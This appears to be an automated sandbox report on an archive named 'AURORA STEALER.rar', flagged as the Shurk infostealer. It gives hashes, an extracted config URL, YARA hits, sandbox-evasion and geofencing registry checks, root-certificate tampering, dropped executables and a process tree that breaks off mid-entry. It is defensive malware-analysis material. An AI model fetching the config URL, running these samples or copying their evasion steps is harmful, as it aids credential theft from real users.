Analysis
-
max time kernel
140s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
22-07-2024 16:42
Behavioral task
behavioral1
Sample
AURORA STEALER.rar
Resource
win10v2004-20240709-en
General
-
Target
AURORA STEALER.rar
-
Size
10.9MB
-
MD5
7077d053f377ac289bde8e57de60f4a5
-
SHA1
779664f5ff55cd1035e58f2f5568e8a41a370288
-
SHA256
282cd2c35141a47148dae9a17263d20edf209dca310112ebb11c47710091fdf7
-
SHA512
9118b53f275784ad90a3a7bfc5cd578a51fb000bff5d9beab14a4c47b3e2ba8b7c005530c3871166172f6edf090c9763d811225bedeb2327c8034d2a67511a67
-
SSDEEP
196608:JXoE/rNj9hezMG/8YV8XUEQNar9lG45v/MdB3Nb2e9mMIF0HjS:JBpheIGEzHEi/kNb2esF9
Malware Config
Extracted
https://rentry.org/sb54d2/raw
Signatures
-
Shurk
Shurk is an infostealer, written in C++ which appeared in 2021.
-
Shurk Stealer payload 11 IoCs
resource yara_rule behavioral1/files/0x000700000002373e-1542.dat shurk_stealer behavioral1/files/0x0007000000023748-1548.dat shurk_stealer behavioral1/memory/4984-1562-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer behavioral1/memory/2940-1576-0x00007FF7C7340000-0x00007FF7C8C4B000-memory.dmp shurk_stealer behavioral1/memory/3676-1612-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer behavioral1/memory/4516-1625-0x00007FF668680000-0x00007FF669F8B000-memory.dmp shurk_stealer behavioral1/files/0x0007000000023748-1638.dat shurk_stealer behavioral1/memory/2436-1649-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer behavioral1/memory/5844-1661-0x00007FF68E0D0000-0x00007FF68F9DB000-memory.dmp shurk_stealer behavioral1/memory/3480-1683-0x0000000000400000-0x0000000001D8A000-memory.dmp shurk_stealer behavioral1/memory/3632-1684-0x00007FF7C1370000-0x00007FF7C2C7B000-memory.dmp shurk_stealer -
Blocklisted process makes network request 2 IoCs
flow pid Process 128 2448 powershell.exe 144 5920 powershell.exe -
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Aurora.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation black.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Aurora.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation Aurora.exe Key value queried \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation black.exe -
Executes dropped EXE 9 IoCs
pid Process 4984 Aurora.exe 2940 Aurora 22.12.2022_.exe 3692 black.exe 3676 Aurora.exe 4516 Aurora 22.12.2022_.exe 2844 black.exe 2436 Aurora.exe 5844 Aurora 22.12.2022_.exe 5940 black.exe -
pid Process 2448 powershell.exe 5920 powershell.exe 1032 powershell.exe 2576 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName taskmgr.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe -
Modifies registry class 3 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings cmd.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings OpenWith.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d00f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Aurora 22.12.2022_.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800001900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Aurora 22.12.2022_.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Aurora 22.12.2022_.exe -
Suspicious behavior: EnumeratesProcesses 52 IoCs
pid Process 2448 powershell.exe 2448 powershell.exe 2448 powershell.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 5920 powershell.exe 5920 powershell.exe 5920 powershell.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 4596 OpenWith.exe -
Suspicious use of AdjustPrivilegeToken 20 IoCs
description pid Process Token: SeDebugPrivilege 2152 firefox.exe Token: SeDebugPrivilege 2152 firefox.exe Token: SeRestorePrivilege 5392 7zG.exe Token: 35 5392 7zG.exe Token: SeSecurityPrivilege 5392 7zG.exe Token: SeSecurityPrivilege 5392 7zG.exe Token: SeRestorePrivilege 3128 7zG.exe Token: 35 3128 7zG.exe Token: SeSecurityPrivilege 3128 7zG.exe Token: SeSecurityPrivilege 3128 7zG.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 2028 taskmgr.exe Token: SeSystemProfilePrivilege 2028 taskmgr.exe Token: SeCreateGlobalPrivilege 2028 taskmgr.exe Token: SeDebugPrivilege 5920 powershell.exe Token: SeDebugPrivilege 2152 firefox.exe Token: SeDebugPrivilege 2152 firefox.exe Token: SeDebugPrivilege 2152 firefox.exe Token: 33 2028 taskmgr.exe Token: SeIncBasePriorityPrivilege 2028 taskmgr.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 5392 7zG.exe 3128 7zG.exe 2152 firefox.exe 2152 firefox.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2152 firefox.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe 2028 taskmgr.exe -
Suspicious use of SetWindowsHookEx 46 IoCs
pid Process 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 4596 OpenWith.exe 2152 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4596 wrote to memory of 4964 4596 OpenWith.exe 95 PID 4596 wrote to memory of 4964 4596 OpenWith.exe 95 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 4964 wrote to memory of 2152 4964 firefox.exe 97 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 1004 2152 firefox.exe 98 PID 2152 wrote to memory of 3132 2152 firefox.exe 100 PID 2152 wrote to memory of 3132 2152 firefox.exe 100 PID 2152 wrote to memory of 3132 2152 firefox.exe 100 PID 2152 wrote to memory of 3132 2152 firefox.exe 100 PID 2152 wrote to memory of 3132 2152 firefox.exe 100 PID 2152 wrote to memory of 3132 2152 firefox.exe 100 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"1⤵
- Modifies registry class
PID:3348
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4596 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"2⤵
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "C:\Users\Admin\AppData\Local\Temp\AURORA STEALER.rar"3⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1896 -prefMapHandle 1888 -prefsLen 25753 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {255ca822-40d3-480b-9327-f587583cd199} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" gpu4⤵PID:1004
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2336 -parentBuildID 20240401114208 -prefsHandle 2400 -prefMapHandle 2396 -prefsLen 26673 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8c28ea6-fb9c-4220-82b6-bceb437cc508} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" socket4⤵PID:3132
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3360 -childID 1 -isForBrowser -prefsHandle 3420 -prefMapHandle 3276 -prefsLen 26814 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {3232f438-8d34-45ec-9f10-e3b19adfb174} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab4⤵PID:1540
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3612 -childID 2 -isForBrowser -prefsHandle 3636 -prefMapHandle 3632 -prefsLen 31163 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {438bedc0-588b-4131-a28a-2d5f10f0c68f} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab4⤵PID:4036
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5332 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 5312 -prefMapHandle 5316 -prefsLen 29276 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b195af93-cc02-4220-a742-7013d91c2cb3} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" utility4⤵
- Checks processor information in registry
PID:5764
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5280 -childID 3 -isForBrowser -prefsHandle 5436 -prefMapHandle 5428 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {faaa1eec-85f9-414e-8207-f8c792207c87} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab4⤵PID:5888
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5596 -childID 4 -isForBrowser -prefsHandle 5604 -prefMapHandle 5608 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e010fa25-7934-41db-853f-eb1e8edccf47} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab4⤵PID:5932
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5916 -childID 5 -isForBrowser -prefsHandle 5836 -prefMapHandle 5840 -prefsLen 27130 -prefMapSize 244658 -jsInitHandle 1252 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ec5846be-7dd6-4620-b7b5-022ccb4f9c3f} 2152 "\\.\pipe\gecko-crash-server-pipe.2152" tab4⤵PID:5944
-
-
-
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5264
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\AURORA STEALER\" -spe -an -ai#7zMap29288:108:7zEvent53611⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5392
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\AURORA STEALER\" -spe -an -ai#7zMap28592:108:7zEvent177561⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:3128
-
C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"C:\Users\Admin\Desktop\AURORA STEALER\AURORA_STEALER\Aurora.exe"1⤵
- Checks computer location settings
- Executes dropped EXE
PID:4984 -
C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"C:\Users\Admin\AppData\Local\Temp\Aurora 22.12.2022_.exe"2⤵
- Executes dropped EXE
PID:2940
-
-
C:\Users\Admin\AppData\Local\Temp\black.exe"C:\Users\Admin\AppData\Local\Temp\black.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3692 -
